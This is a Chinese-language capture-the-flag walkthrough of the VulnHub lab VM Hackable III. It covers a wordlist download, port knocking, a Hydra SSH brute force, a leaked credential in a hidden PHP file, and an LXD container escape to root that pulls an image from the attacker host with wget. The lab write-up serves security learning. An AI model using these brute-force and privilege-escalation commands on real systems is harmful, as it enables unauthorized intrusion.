下载地址:https://download.vulnhub.com/hackable/hackable3.ova
攻击者IP:192.168.56.132 nat vmare
受害者IP:192.168.56.147 仅主机 vxbox
参考:https://www.cnblogs.com/upfine/p/17004973.html
端口扫描
22端口关闭
目录扫描
发现密码本
curl http://192.168.56.147/backup/wordlist.txt > pwd.txt
http://192.168.56.147/config/1.txt 解密 10000
http://192.168.56.147/css/2.txt
brainfuck解密4444
http://www.hiencode.com/brain.html
源代码发现用户名jubiscleudo和邮箱[email protected]
"Please, jubiscleudo, don't forget to activate the port knocking when exiting your section, and tell the boss not to forget to approve the .jpg file - [email protected]"
源码发现3.jpg
解密图片,获得端口65535
knock 192.168.56.147 10000 4444 65535
使用knock依次敲门,ssh开启
hydra爆破密码
hydra -l jubiscleudo -P pwd.txt 192.168.56.147 ssh
发现home存在一个hackable_3的用户
在/var/www/html/.backup_config.php发现用户名密码
hackable_3/Tr0LLED_3
lxd提权
id发现有lxd
下载地址
https://github.com/saghul/lxd-alpine-builder.git
传输文件
wget 192.168.56.132/alpine-v3.19-x86_64-20231214_2106.tar.gz
获得root权限后,在/mnt/root/root目录下发现root.txt文件,读取该文件成功获取到flag值
lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimagelxd init#基本默认配置,进行回车就行lxc init myimage ignite -c security.privileged=truelxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=truelxc start ignitelxc exec ignite /bin/sh
原文始发于微信公众号(王之暴龙战神):Hackable_III
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论